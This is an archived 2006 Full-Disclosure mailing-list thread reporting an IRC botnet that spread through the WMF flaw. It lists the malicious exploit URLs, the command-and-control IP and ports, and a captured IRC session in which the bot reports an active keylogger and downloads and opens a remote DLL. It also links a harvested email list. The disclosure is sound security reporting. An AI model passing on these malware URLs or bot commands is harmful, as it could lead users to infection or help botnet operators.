| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri Jan 20 17:58:46 2006 From: stan.bubrouski at gmail.com (Stan Bubrouski) Subject: Possible large botnet Is it just me who thinks linking to a log of thousands of e-mail addresses is in very poor taste on a mirrored list? If they weren't harvested before they will be now. -sb On 1/20/06, obnoxious@...h.com <obnoxious@...h.com> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I don't necessarily think whomever was infected was infected via > viewing this site: > > http://php.tjit.or.kr/ppp/log/sent.txt > > Lists a slew of email addresses which whomever "could have" sent > bogus messages to possibly infect (l)users. > > On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban > <pablo_esterban@...mail.com> wrote: > >Seems to be a botnet forming with the help of exploiting the > >recent wmf flaw > >on the following site. AFAIK malware/adware is referencing this. > > > > > >************D O N O T C L I C K************ > >http://213.17.233.194/mediabar.wmf > >http://213.17.233.194/stat_s3.php > >http://213.17.233.194/stat.html > >************D O N O T C L I C K************ > > > >This injects a trojan connecting to 219.240.142.59 on port 44234 > > > >44234/tcp open irc Unreal ircd > >47292/tcp open irc Unreal ircd > >47296/tcp open irc Unreal ircd > >54729/tcp open irc-proxy psyBNC 2.3.1 > > > >Channel stats list around 500 bots and around 1200 connected (may > >or may not > >be accurate), however if you poke around you will find > >http://219.240.142.59/usage/, containing some interesting links > >and info > >about when this most likely started. > > > >The tcp stream below demos the login, and calling of > >http://219.240.142.59/ppp/mediax.dll. Stats for January list close > > >to 90k > >hits on this particular file(!). > > > > > >NICK ***** > > > >USER plnaehe 0 0 :***** > > > >:irc.foonet.com NOTICE AUTH :*** Looking up your hostname... > > > >:irc.foonet.com NOTICE AUTH :*** Found your hostname > > > >:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network ***** > > > >:irc.foonet.com 002 *****:Your host is irc.foonet.com, running > >version > >Unreal3.2.3 > > > >:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 > >at > >17:25:57 KST > > > >:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 > >CHANLIMIT=#:10 > >MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 > >KICKLEN=307 > >AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by > >this server > > > >:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# > >PREFIX=(ohv)@%+ > >CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet > >CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS > >INVEX > >CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server > > > >:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on > >1 servers > > > >:irc.foonet.com 252 *****1 :operator(s) online > > > >:irc.foonet.com 253 *****201 :unknown connection(s) > > > >:irc.foonet.com 254 *****10 :channels formed > > > >:irc.foonet.com 255 *****:I have 1195 clients and 0 servers > > > >:irc.foonet.com 265 *****:Current Local Users: 1195 Max: 5529 > > > >:irc.foonet.com 266 *****:Current Global Users: 1195 Max: 1276 > > > >:irc.foonet.com 422 *****:MOTD File is missing > > > >*****MODE *****:+iwTxd > > > >USERHOST ***** > > > >:irc.foonet.com 302 *****:***** > > > >MODE *****-x+B > > > >JOIN #mrbean5 rowan > > > >PRIVMSG *****:[KEYLOG]: Key logger active. > > > >USERHOST ***** > > > >MODE *****-x+B > > > >JOIN #mrbean5 rowan > > > >USERHOST ***** > > > >MODE *****-x+B > > > >JOIN #mrbean5 rowan > > > >:irc.foonet.com NOTICE *****:BOTMOTD File not found > > > >*****MODE *****:-x+B > > > >***** JOIN :#mrbean5 > > > >:irc.foonet.com 332 *****#mrbean5 :.wipe > >http://219.240.142.59/ppp/mediax.dll mediax.dll 3 > > > >:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387 > > > >:irc.foonet.com 353 *****@ #mrbean5 ***** > > > >:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list. > > > >*****PRIVMSG *****:[KEYLOG]: Key logger active. > > > >:irc.foonet.com 302 ***** > > > >:irc.foonet.com 302 ***** > > > >PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: > >http://219.240.142.59/ppp/mediax.dll to: mediax.dll. > > > >:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5) > > > >PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to > >C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec. > > > >PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: > >C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll. > > > >:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5) > > > >:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5) > > > >_________________________________________________________________ > >Don't just search. Find. Check out the new MSN Search! > >http://search.msn.click-url.com/go/onm00200636ave/direct/01/ > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Note: This signature can be verified at https://www.hushtools.com/verify > Version: Hush 2.4 > > wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA > oIe+zN0P1qsDz+gfy4da+vfZ+A3y > =suSR > -----END PGP SIGNATURE----- > > > > > Concerned about your privacy? Instantly send FREE secure email, no account required > http://www.hushmail.com/send?l=480 > > Get the best prices on SSL certificates from Hushmail > https://www.hushssl.com?l=485 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
Powered by blists - more mailing lists